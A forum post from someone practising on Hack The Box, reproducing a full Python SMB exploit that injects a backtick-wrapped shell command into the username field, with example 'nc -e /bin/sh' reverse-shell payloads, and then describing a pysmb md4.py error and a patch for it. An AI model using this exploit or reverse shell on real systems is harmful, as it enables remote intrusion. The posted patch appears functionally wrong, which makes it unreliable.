Hey everyone,
Im writing here since im not confident enough to report this as a bug so that please review what i’ve written here:
My system:
Linux P4cm4n 5.15.0-33-generic #34-Ubuntu SMP Wed May 18 13:34:26 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Python version: Python 3.10.4 (main, Apr 2 2022, 09:04:19) [GCC 11.2.0] on linux
I was doing hack the box machines and trying to use one of the exploit
#!/usr/bin/python3
import sys
try:
from smb.SMBConnection import SMBConnection
except:
print("pysmb is not installed: python3 -m pip install pysmb")
quit()
if not (2 < len(sys.argv) < 5):
print("Usage:")
print(" python3 smbExploit.py <IP> <PORT> <PAYLOAD>")
print(" IP - Ip of the remote machine.")
print(" PORT - (Optional) Port that smb is running on.")
print(" PAYLOAD - Payload to be executed on the remote machine e.g. reverse shell.")
print("")
print("Example: python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'")
quit()
if len(sys.argv) == 3:
ip = sys.argv[1]
port = 139
payload = sys.argv[2]
else:
ip = sys.argv[1]
port = sys.argv[2]
payload = sys.argv[3]
user = "`" + payload + "`"
conn = SMBConnection(user, "na", "na", "na", use_ntlm_v2=False)
try:
print("[*] Sending the payload")
conn.connect(ip, int(port))
print("[*] Payload was send successfully")
quit()
except Exception as e:
print("[*] Something went wrong")
print(e.args)
print("ERROR:")
print(e)
quit()
print("Example: python3 exploit.py 10.10.10.3 139 'nc -e /bin/sh 10.10.14.3 4444'")
This script return an error in:
File "/home/p4cm4n/.local/lib/python3.10/site-packages/smb/utils/md4.py", line 251, in int_array2str
nstr = nstr + str(chr(i))
TypeError: 'U32' object cannot be interpreted as an integer
So i make some upgrades of file md4.py
Changes in file:
smb/utils/md4.py
Removed:
def int_array2str(array):
nstr = ''
for i in array:
nstr = nstr + str(chr(i))
return nstr
Added:
def int_array2str(array):
return ''.join(str(array))
After that everything works perfectly.